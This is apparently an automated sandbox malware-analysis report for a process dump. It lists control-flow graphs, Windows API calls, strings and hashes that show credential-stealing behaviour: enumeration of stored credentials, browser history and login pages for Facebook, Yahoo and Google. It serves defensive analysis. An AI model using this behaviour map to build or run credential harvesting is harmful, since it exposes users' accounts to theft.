                                                                                                                                                                                                                          control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-409248 call 40b273 call 438552 563->569 574 409383-4093ab call 40b273 call 438552 569->574 575 40924e-409258 call 4251c4 569->575 587 4093b1 574->587 588 4094ff-409502 call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 591 4093d3-4093dd call 4251c4 587->591 594 409507-40950b 588->594 598 4093b3-4093cc call 4253cf * 2 591->598 599 4093df 591->599 594->568 597 40950d-409511 594->597 597->568 601 409513-40951d call 408f2f 597->601 598->591 614 4093ce-4093d1 598->614 602 4094f7-4094fa call 424f26 599->602 601->568 602->588 611->580 613 40929f-4092a3 611->613 613->580 615 4092a9-4092ba 613->615 614->591 616 4093e4-4093fb call 4253af * 2 614->616 617 4092bc 615->617 618 4092be-4092e3 memcpy memcmp 615->618 616->602 628 409401-409403 616->628 617->618 619 409333-409345 memcmp 618->619 620 4092e5-4092ec 618->620 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->602 629 409409-40941b memcmp 628->629 629->602 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->602 634 4094b8-4094ed memcpy * 2 631->634 632->602 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->602
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                          • Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                                                                          • API String ID: 327780389-2689659898
                                                                                                                                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                                                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 712 4467ac-4467b7 __setusermatherr 703->712 713 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->713 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 711 446755-446758 707->711 709->701 710 44673d-446745 709->710 710->711 711->703 712->713 716 446810-446819 713->716 717 44681e-446825 713->717 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                                                                          • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                          • API String ID: 3883404497-2982631422
                                                                                                                                                                                                                          • Opcode ID: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 509814883-3916222277
                                                                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 876 418506-418515 ??3@YAXPAX@Z 871->876 872->871 876->856
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                                          • API String ID: 1407640353-1717621600
                                                                                                                                                                                                                          • Opcode ID: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                                                                                                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                          • API String ID: 62308376-4196376884
                                                                                                                                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                          Memory Dump Source
